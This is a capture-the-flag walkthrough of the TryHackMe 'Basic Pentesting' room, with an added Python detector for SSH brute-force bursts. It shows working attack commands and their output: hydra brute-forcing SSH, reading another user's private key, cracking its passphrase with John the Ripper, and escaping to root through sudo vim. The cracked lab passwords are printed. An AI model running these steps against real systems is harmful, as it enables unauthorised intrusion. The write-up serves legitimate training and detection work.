
Basic Pentesting

Platform: TryHackMe
Difficulty: Medium
Category: Linux, Web, PrivEsc
Author: unicorn
Room focused on fundamental penetration testing skills: service enumeration, SMB analysis, brute-forcing SSH credentials, and Linux privilege escalation via weak file permissions. Good introduction to a real pentesting workflow.
Tools: nmap, enum4linux, hydra, ssh, find, john
1. Reconnaissance
Step 1: Port Scan with Nmap
Start with a full port scan to discover all open services on the target.
$ nmap -sV -sC -p- --min-rate 5000 10.10.x.x

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
445/tcp open netbios-ssn Samba smbd 4.3.11
8009/tcp open ajp13 Apache Jserv
8080/tcp open http Apache Tomcat 9.0.0.M1
Found: SSH, HTTP (Apache + Tomcat), SMB (Samba 4.3.11)
Step 2: SMB Enumeration
Enumerate SMB shares and users with enum4linux to find potential attack vectors.
$ enum4linux -a 10.10.x.x

[+] Getting domain info...
Domain Name: WORKGROUP

[+] Enumerating users...
user:[kay] rid:[0x3e8]
user:[jan] rid:[0x3e9]

[+] Share Enumeration...
Sharename: Anonymous Access: READ
Discovered users: kay and jan — targets for brute force
2. Exploitation — SSH Brute Force
Step 3: Brute Force SSH with Hydra
Use the discovered usernames and the rockyou.txt wordlist to brute-force the SSH login.
$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.x.x -t 4

[DATA] attacking ssh://10.10.x.x:22/
[22][ssh] host: 10.10.x.x login: jan password: armando
1 of 1 target successfully completed
Connect via SSH with found credentials:
$ ssh jan@10.10.x.x
jan@10.10.x.x's password: armando

jan@basic-pentesting:~$ # shell obtained
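A defender's counterpart to the hydra step above, added here as an example that is not part of the original writeup: it replays a constructed sshd auth.log excerpt (host name, source addresses and timestamps are made up) and raises one alert when a single source piles up failed logins inside a short window, and a second when that same source is then accepted, which is what a successful brute force looks like from the server side. The threshold and window size are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd auth.log excerpt (not from the room): a hydra-style burst of
# failures from one source, then an accepted login; a second host stays benign.
SAMPLE_AUTH_LOG = """\
Mar 10 09:15:01 basic-pentesting sshd[2101]: Failed password for jan from 10.10.14.5 port 40210 ssh2
Mar 10 09:15:02 basic-pentesting sshd[2103]: Failed password for jan from 10.10.14.5 port 40212 ssh2
Mar 10 09:15:02 basic-pentesting sshd[2105]: Failed password for jan from 10.10.14.5 port 40214 ssh2
Mar 10 09:15:03 basic-pentesting sshd[2107]: Failed password for invalid user admin from 10.10.14.5 port 40216 ssh2
Mar 10 09:15:04 basic-pentesting sshd[2109]: Failed password for jan from 10.10.14.5 port 40218 ssh2
Mar 10 09:15:05 basic-pentesting sshd[2111]: Accepted password for jan from 10.10.14.5 port 40220 ssh2
Mar 10 09:20:00 basic-pentesting sshd[2200]: Accepted publickey for kay from 192.168.1.20 port 50100 ssh2
Mar 10 09:30:00 basic-pentesting sshd[2300]: Failed password for kay from 192.168.1.20 port 50102 ssh2
"""

# Standard sshd "Failed/Accepted <method> for [invalid user] <user> from <src> port <n>" line.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def detect_ssh_bruteforce(log_text, threshold=5, window_s=60):
    """Return (kind, source, user, timestamp) alerts.
    'burst' fires once per source at `threshold` failures within `window_s`
    seconds; 'success_after_burst' fires when a login from a source that is
    still inside a burst is accepted, which is how a hydra hit looks server-side.
    """
    failures = defaultdict(deque)  # source IP -> timestamps of recent failures
    alerted = set()                # sources already reported as a burst
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog has no year
        src, user = m["src"], m["user"]
        recent = failures[src]
        while recent and (ts - recent[0]).total_seconds() > window_s:
            recent.popleft()  # drop failures that fell out of the window
        if m["result"] == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and src not in alerted:
                alerted.add(src)
                alerts.append(("burst", src, user, m["ts"]))
        elif len(recent) >= threshold:
            alerts.append(("success_after_burst", src, user, m["ts"]))
    return alerts
```

Feeding the live /var/log/auth.log through the same loop gives the server-side view of the hydra run; the `-t 4` above only spreads the failures over more time, it does not hide them.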
3. Privilege Escalation
Step 4: Find SSH Key for User Kay
After getting a shell as jan, look for privilege escalation paths to the second user and then to root.
jan@basic-pentesting:~$ ls /home/
jan kay

jan@basic-pentesting:~$ ls /home/kay/.ssh/
id_rsa id_rsa.pub authorized_keys

jan@basic-pentesting:~$ cat /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,...
... [encrypted key] ...
Found an encrypted RSA private key that jan can read; crack its passphrase with John the Ripper.
Step 5: Crack SSH Key Password with John
$ ssh2john id_rsa > id_rsa.hash
$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

beeswax (id_rsa)
1g 0:00:00:03 DONE

$ ssh -i id_rsa kay@10.10.x.x # passphrase: beeswax
kay@basic-pentesting:~$
Step 6: Root via Sudo Rights
kay@basic-pentesting:~$ sudo -l
User kay may run the following commands:
(ALL) NOPASSWD: /usr/bin/vim

kay@basic-pentesting:~$ sudo vim -c ':!/bin/bash'
root@basic-pentesting:~#
vim with sudo + GTFOBins → root shell
Flags
user.txt
THM{[obtained after SSH as kay]}
root.txt
THM{[obtained after root via vim sudo]}
Key Takeaways
Always enumerate SMB — usernames found there enabled the whole attack chain
Weak SSH passwords are still common — hydra + rockyou is effective
Encrypted SSH private keys can be cracked offline with John the Ripper
sudo misconfiguration (vim, less, python) = instant root via GTFOBins